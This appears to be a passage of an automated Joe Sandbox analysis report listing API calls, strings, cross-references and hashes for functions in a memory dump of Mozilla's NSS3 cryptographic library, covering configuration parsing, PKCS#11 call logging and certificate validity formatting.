winGetTempname4, xrefs: 6CF57046
winGetTempname5, xrefs: 6CF57071

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: c73d2822e5437f8a83b85bf0a7cd9223a72ee7853462ad2ff26b541a9d81fbaa
Instruction ID: 0a3c647d9bf038842e163df992be9a0881b66431fb4b2d1ebb00ef9a91195e0f
Opcode Fuzzy Hash: c73d2822e5437f8a83b85bf0a7cd9223a72ee7853462ad2ff26b541a9d81fbaa
Instruction Fuzzy Hash: 4A518EB2F1011167E70496309C51FBB36A69FA2318F64453CFA1197BC2FB26992E82D3

Function 6CEE4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000,00000000,00000001), ref: 6CEE5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2,00000000), ref: 6CEE5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CEE505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6CEE5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CEE50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE975C2), ref: 6CEE50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CEE50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEE50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE5153
free.MOZGLUE(?), ref: 6CEE516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CEE517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CEE5195

Strings

config=, xrefs: 6CEE509B
parameters=, xrefs: 6CEE506B
library=, xrefs: 6CEE5043
nss=, xrefs: 6CEE5083
name=, xrefs: 6CEE5057

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: d399da5f0918696276e8f1b60c19ee4ff54bfb80a6a629645f778c680f9e5221
Instruction ID: b0fd658167cedc155f2d2c7295b69c63ab13c9c03aaf406f28a45449ee1d8453
Opcode Fuzzy Hash: d399da5f0918696276e8f1b60c19ee4ff54bfb80a6a629645f778c680f9e5221
Instruction Fuzzy Hash: A05193B5A122165BEB00DF349C41AAB37B89F0A38CF240464EC15E7741EB25E919CBB2

Function 6CEB8E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6CEB8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB8EB3

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CEB8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6CEB8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB8F29
PR_LogPrint.NSS3(?,00000000), ref: 6CEB8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CEB8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB8F80
PR_LogPrint.NSS3(?,00000000), ref: 6CEB8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6CEB8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6CEB8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6CEB9047

Strings

C_WrapKey, xrefs: 6CEB8E71
*pulWrappedKeyLen = 0x%x, xrefs: 6CEB9042
hKey = 0x%x, xrefs: 6CEB8F5B, 6CEB8F6B
pWrappedKey = 0x%p, xrefs: 6CEB8FAD
pulWrappedKeyLen = 0x%p, xrefs: 6CEB8FC8
hWrappingKey = 0x%x, xrefs: 6CEB8F01, 6CEB8F11
hSession = 0x%x, xrefs: 6CEB8E8E, 6CEB8E9E
pMechanism = 0x%p, xrefs: 6CEB8EE0
(CK_INVALID_HANDLE), xrefs: 6CEB8EAC, 6CEB8F1F, 6CEB8F79

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: afb91b04156a937441a7a5e17ab9eed31735807643be13f99fb1814d41a04173
Instruction ID: 53f6416a78f11a6ff0eff8b57578a4510945bfb5536eb412e5c14bdc4e8bb438
Opcode Fuzzy Hash: afb91b04156a937441a7a5e17ab9eed31735807643be13f99fb1814d41a04173
Instruction Fuzzy Hash: FF510631A0110AFFDB549F40DE48FAE7B72AB4A30CF154429F50877B12EB369919CB91

Function 6CEE4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CED4F51,00000000), ref: 6CEE4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CED4F51,00000000), ref: 6CEE4C5B
PR_smprintf.NSS3(6CFBAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CED4F51,00000000), ref: 6CEE4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CED4F51,00000000), ref: 6CEE4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CEE4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CEE4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CEE4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CED4F51,00000000), ref: 6CEE4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CED4F51,00000000), ref: 6CEE4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CEE4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CEE4DA2
free.MOZGLUE(?), ref: 6CEE4DB9
free.MOZGLUE(00000000), ref: 6CEE4DCF

Strings

any, xrefs: 6CEE4C96
rust, xrefs: 6CEE4D22
rootFlags, xrefs: 6CEE4D47
every, xrefs: 6CEE4CA1
ootT, xrefs: 6CEE4D1A
slotFlags, xrefs: 6CEE4D34
%s,%s, xrefs: 6CEE4C4B
0x%08lx=[%s %s], xrefs: 6CEE4D80
timeout, xrefs: 6CEE4C91
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CEE4D9D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: ab191f5055bbc0a0521ab9a038805c6843bfa397c609d313ceacd126dcc22bb2
Instruction ID: 98f82909749840b612e170d6d2ddf6a19ed5a9f65ba090190003ade33ae727f3
Opcode Fuzzy Hash: ab191f5055bbc0a0521ab9a038805c6843bfa397c609d313ceacd126dcc22bb2
Instruction Fuzzy Hash: D14190B1D101416BEB129FA59C44ABF3775AF8A38CF29412AEC155BB01EB31E924C7D3

Function 6CEC6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CEC6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CEC6943
Part of subcall function 6CEC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CEC6957
Part of subcall function 6CEC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CEC6972
Part of subcall function 6CEC6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CEC6983
Part of subcall function 6CEC6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CEC69AA
Part of subcall function 6CEC6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CEC69BE
Part of subcall function 6CEC6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CEC69D2
Part of subcall function 6CEC6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CEC69DF
Part of subcall function 6CEC6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CEC6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CEC6D8C
free.MOZGLUE(00000000), ref: 6CEC6DC5
free.MOZGLUE(?), ref: 6CEC6DD6
free.MOZGLUE(?), ref: 6CEC6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CEC6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CEC6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CEC6E72
free.MOZGLUE(?), ref: 6CEC6EA7
free.MOZGLUE(?), ref: 6CEC6EC4
free.MOZGLUE(?), ref: 6CEC6ED5
free.MOZGLUE(00000000), ref: 6CEC6EE3
free.MOZGLUE(?), ref: 6CEC6EF4
free.MOZGLUE(?), ref: 6CEC6F08
free.MOZGLUE(00000000), ref: 6CEC6F35
free.MOZGLUE(?), ref: 6CEC6F44
free.MOZGLUE(?), ref: 6CEC6F5B
free.MOZGLUE(00000000), ref: 6CEC6F65

Part of subcall function 6CEC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CEC781D,00000000,6CEBBE2C,?,6CEC6B1D,?,?,?,?,00000000,00000000,6CEC781D), ref: 6CEC6C40
Part of subcall function 6CEC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CEC781D,?,6CEBBE2C,?), ref: 6CEC6C58
Part of subcall function 6CEC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CEC781D), ref: 6CEC6C6F
Part of subcall function 6CEC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CEC6C84
Part of subcall function 6CEC6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CEC6C96
Part of subcall function 6CEC6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CEC6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CEC6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CEC6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CEC6FF4

Strings

+`l, xrefs: 6CEC6D0D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`l
API String ID: 1304971872-283784926
Opcode ID: 8e8d0b076773f81e33159858c1dd0ca5f28ebd51d90d4c50797e5c001408425c
Instruction ID: 98c3fc1f9cb108332da8ced8606a0c985d2b28af44b6fdd0b69e796b19cb96fa
Opcode Fuzzy Hash: 8e8d0b076773f81e33159858c1dd0ca5f28ebd51d90d4c50797e5c001408425c
Instruction Fuzzy Hash: 2DB11BB5F012199FDF00DBA5DA45BAFBBB8AF0534CF240025E825E7741E731A915CBA2

Function 6CE8DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CE8DDDE

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CE8DDF5

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CE8DE34
PR_Now.NSS3 ref: 6CE8DE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CE8DE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE8DEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE8DEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CE8DED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6CE8DEF0
PR_smprintf.NSS3(6CFBAAF9,(NULL) (Validity Unknown)), ref: 6CE8DF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE8DF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE8DF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CE8DF33
free.MOZGLUE(00000000), ref: 6CE8DF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE8DF4B
free.MOZGLUE(00000000), ref: 6CE8DF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE8DF8E

Strings

{???}, xrefs: 6CE8DE8B
(NULL) (Validity Unknown), xrefs: 6CE8DEFA
%s%s, xrefs: 6CE8DEEB

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 476608ca017335c9b6227c8cb0d1d7c789b5fd25ff56ab45917bd0eb867eef06
Instruction ID: ca49deb3a993e3df2414ae676ba1e9a39445a2778ca0c007710ae22792722195
Opcode Fuzzy Hash: 476608ca017335c9b6227c8cb0d1d7c789b5fd25ff56ab45917bd0eb867eef06
Instruction Fuzzy Hash: 7E51A4B5E011065BDF10DF659C41AAF7BB9AF85398F244029E80DE7B01EB31DA15CBE2

Function 6CEC2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CEC2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CEC2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CEC2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CEC2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CE94F1C,?,-00000001,00000000,?), ref: 6CEC2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CE94F1C,?,-00000001,00000000), ref: 6CEC2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CEC2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CEC2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CEC2EF8
PR_Unlock.NSS3(?), ref: 6CEC2F62
TlsGetValue.KERNEL32 ref: 6CEC2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CEC2F9E
PR_Unlock.NSS3(?), ref: 6CEC2FCA
TlsGetValue.KERNEL32 ref: 6CEC301A
EnterCriticalSection.KERNEL32(?), ref: 6CEC302E
PR_Unlock.NSS3(?), ref: 6CEC3066
PR_SetError.NSS3(00000000,00000000), ref: 6CEC3085
PR_Unlock.NSS3(?), ref: 6CEC30EC
TlsGetValue.KERNEL32 ref: 6CEC310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CEC3124
PR_Unlock.NSS3(?), ref: 6CEC314C

Part of subcall function 6CEA9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CED379E,?,6CEA9568,00000000,?,6CED379E,?,00000001,?), ref: 6CEA918D
Part of subcall function 6CEA9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CED379E,?,6CEA9568,00000000,?,6CED379E,?,00000001,?), ref: 6CEA91A0

Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707AD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707CD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707D6
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CE0204A), ref: 6CE707E4
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,6CE0204A), ref: 6CE70864
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE70880
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,6CE0204A), ref: 6CE708CB
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708D7
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708FB

PR_SetError.NSS3(00000000,00000000), ref: 6CEC316D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 898b4142bd68c8a85265cf3206ca6544ecd2dede9fbd412845a097e487bc7c47
Instruction ID: a4201ef059192ffbaa386300ead3ca10885f40ad40297dd241f3667e6071f3b2
Opcode Fuzzy Hash: 898b4142bd68c8a85265cf3206ca6544ecd2dede9fbd412845a097e487bc7c47
Instruction Fuzzy Hash: 29F19CB1E00608AFDF40DFA8D844B99BBB5BF09318F244169EC14A7711EB31E995CB92

Function 6CEBAF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6CEBAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEBAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEBAF83

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEBAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6CEBAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6CEBAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CEBAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CEBB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CEBB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6CEBB041

Strings

C_SignMessage, xrefs: 6CEBAF41
pulSignatureLen = 0x%p, xrefs: 6CEBB03C
ulParameterLen = 0x%p, xrefs: 6CEBAFD4
ulDataLen = %d, xrefs: 6CEBB00A
pData = 0x%p, xrefs: 6CEBAFEF
pSignature = 0x%p, xrefs: 6CEBB023
pParameter = 0x%p, xrefs: 6CEBAFB9
hSession = 0x%x, xrefs: 6CEBAF5E, 6CEBAF6E
(CK_INVALID_HANDLE), xrefs: 6CEBAF7C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 11faf59c8ebcf9ec635e6a0103e6cd793a3fc81d8dadf00a513b81ec1d26c127
Instruction ID: bccef9e1c05666ee24540fc9673e3d93fe6e7a5e74e10415ffdf7a2b581c3dda
Opcode Fuzzy Hash: 11faf59c8ebcf9ec635e6a0103e6cd793a3fc81d8dadf00a513b81ec1d26c127
Instruction Fuzzy Hash: 3341E635A01009FFDF848F54DE88FA97BB2AB4A30DF194428F50867721DB368D19CBA1

Function 6CEA9FA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CEA9FBE

